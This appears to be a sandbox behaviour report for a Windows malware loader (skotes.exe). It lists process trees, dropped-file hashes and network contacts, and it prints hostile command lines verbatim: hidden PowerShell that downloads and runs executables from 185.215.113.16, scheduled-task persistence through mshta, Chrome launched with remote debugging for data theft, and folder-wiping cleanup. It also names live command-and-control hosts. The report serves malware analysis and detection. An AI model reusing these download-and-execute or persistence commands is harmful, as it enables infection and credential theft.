PID 2716 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2716 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2716 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
PID 2716 wrote to memory of 264 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
PID 264 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Windows\SysWOW64\cmd.exe
PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 264 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3004 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3004 wrote to memory of 2436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 1756 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1580 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2156 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2156 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2156 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2156 wrote to memory of 1044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1756 wrote to memory of 2944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
PID 1756 wrote to memory of 2944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe

"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 68

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"

C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

"C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "qhfSJmalPrD" /tr "mshta \"C:\Temp\hWO8LyeS1.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\hWO8LyeS1.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef70e9758,0x7fef70e9768,0x7fef70e9778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1100 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2384 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1120 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2276 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"

C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5phva" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\system32\taskeng.exe

taskeng.exe {BE56D322-AA82-4DF6-A41C-362E7701F7AC} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]

C:\ProgramData\rwhkbvh\apitlt.exe

C:\ProgramData\rwhkbvh\apitlt.exe

C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe

"C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe"

C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe

"C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe

"C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe"

C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe

"C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 508

C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"

C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe

"C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"

C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe

"C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.75:80 185.215.113.75 tcp
US 8.8.8.8:53 advertised.life udp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
FI 65.109.226.203:443 65.109.226.203 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
GB 142.250.200.14:443 apis.google.com tcp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
N/A 224.0.0.251:5353 udp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 tcp
FI 65.109.226.203:443 tcp
FI 65.109.226.203:443 tcp
FI 65.109.226.203:443 tcp
DE 104.194.157.122:80 104.194.157.122 tcp
FI 65.109.226.203:443 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
FI 65.109.226.203:443 tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
FI 65.109.226.203:443 tcp
FI 65.109.226.203:443 tcp
NL 185.198.234.185:80 cobolrationumelawrtewarms.com tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 udp
US 104.21.48.1:443 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.94.161:443 advertised.life tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 breakfasutwy.cyou udp
US 8.8.8.8:53 importenptoc.com udp
US 8.8.8.8:53 voicesharped.com udp
US 8.8.8.8:53 inputrreparnt.com udp
US 8.8.8.8:53 torpdidebar.com udp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 rebeldettern.com udp
US 8.8.8.8:53 actiothreaz.com udp
DE 93.186.202.3:4000 towerbingobongoboom.com tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 garulouscuto.com udp
US 8.8.8.8:53 breedertremnd.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 outlinedtrai.bet udp
US 104.21.38.27:443 outlinedtrai.bet tcp
US 8.8.8.8:53 investiigato.website udp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp
US 104.21.48.1:443 uncertainyelemz.bet tcp

Files

memory/2520-0-0x0000000000E00000-0x00000000012C9000-memory.dmp

memory/2520-1-0x0000000077A90000-0x0000000077A92000-memory.dmp

memory/2520-2-0x0000000000E01000-0x0000000000E69000-memory.dmp

memory/2520-3-0x0000000000E00000-0x00000000012C9000-memory.dmp

memory/2520-5-0x0000000000E00000-0x00000000012C9000-memory.dmp

memory/2520-16-0x0000000006940000-0x0000000006E09000-memory.dmp

memory/2520-21-0x0000000000E01000-0x0000000000E69000-memory.dmp

\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 78ec3bb0db3cee811be50f99dd89e2fe
SHA1 1ec0122be4458914a8b07c7b0bf34faf47d14c19
SHA256 f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
SHA512 d36b32948ad76a558bbb3dbcbbdfeb911f581ab59b4a7502c09e5b4479b0fe9976cd473870f7dd7717da5c2639817c9990388d39f42e712410533b04893da082

memory/2520-20-0x0000000000E00000-0x00000000012C9000-memory.dmp

memory/2716-22-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2520-18-0x0000000006940000-0x0000000006E09000-memory.dmp

memory/2716-23-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-24-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-27-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-26-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-28-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-29-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-30-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-31-0x0000000000C50000-0x0000000001119000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

MD5 515748a93ce7beb3f4416ec66ba8488e
SHA1 3ba2f1a56dcc91967361622c56b1ba545cda4325
SHA256 a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6
SHA512 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

MD5 896dc9ae02a4b0cf429b4346a3990fae
SHA1 17f297bb4cf3acd07078fc5d73c1d6564a8c0710
SHA256 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2
SHA512 e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c

memory/2940-61-0x000000013FF20000-0x00000001403DB000-memory.dmp

memory/1740-62-0x00000000011E0000-0x0000000001290000-memory.dmp

memory/2820-78-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-73-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-71-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-69-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-67-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-65-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-76-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2820-75-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2716-82-0x0000000000C50000-0x0000000001119000-memory.dmp

memory/2716-83-0x0000000000C50000-0x0000000001119000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

MD5 87da0483aefde76a5086c5b2ea14304f
SHA1 ae6b27aeaf487666c71b26397709004e65b09002
SHA256 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f
SHA512 ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4

memory/2996-98-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2716-97-0x0000000006AB0000-0x0000000006F1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab36BC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar36CE.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 85161b67da1a3df1f9d35b48d05dfcd1
SHA1 c61740cf82fa55a77f3d2fe8f0fc7cb1fa9d0ddf
SHA256 d97f42f4b1dbdaf9afdded0834b6aa07d795f4f38827c07faa5503f1873059b7
SHA512 78b7f5e8f462b2e49de2338c0f29238a99c785286f230dc8176b89d2f78916b2a42aa497c0d42a0d047ea404e6bff0ba50ee8dabb8fb9ffc38bfc64ae7e21f4f

C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe

MD5 5b0bf9144e2661027c1621957b1ef278
SHA1 589efc0736ecc18d94e4dd8d353502e8d76738c4
SHA256 a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f
SHA512 e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177

C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta

MD5 6a3a2756387d1c8e5ec150c2f910e488
SHA1 be8a023493cfce056e8cfd884498984c26be48bd
SHA256 60b7dc972da88caf9e242c773088e1df29aa3d9fa2f52049c2cf1441aad6363a
SHA512 9778be38d5e30700fc56cf6092972fe8a19b024ab81078924055c1cbf662acc7f003cb2253788ec67f022ff33d0fd66aead8c75f8125e5f830cc989fae470659

C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
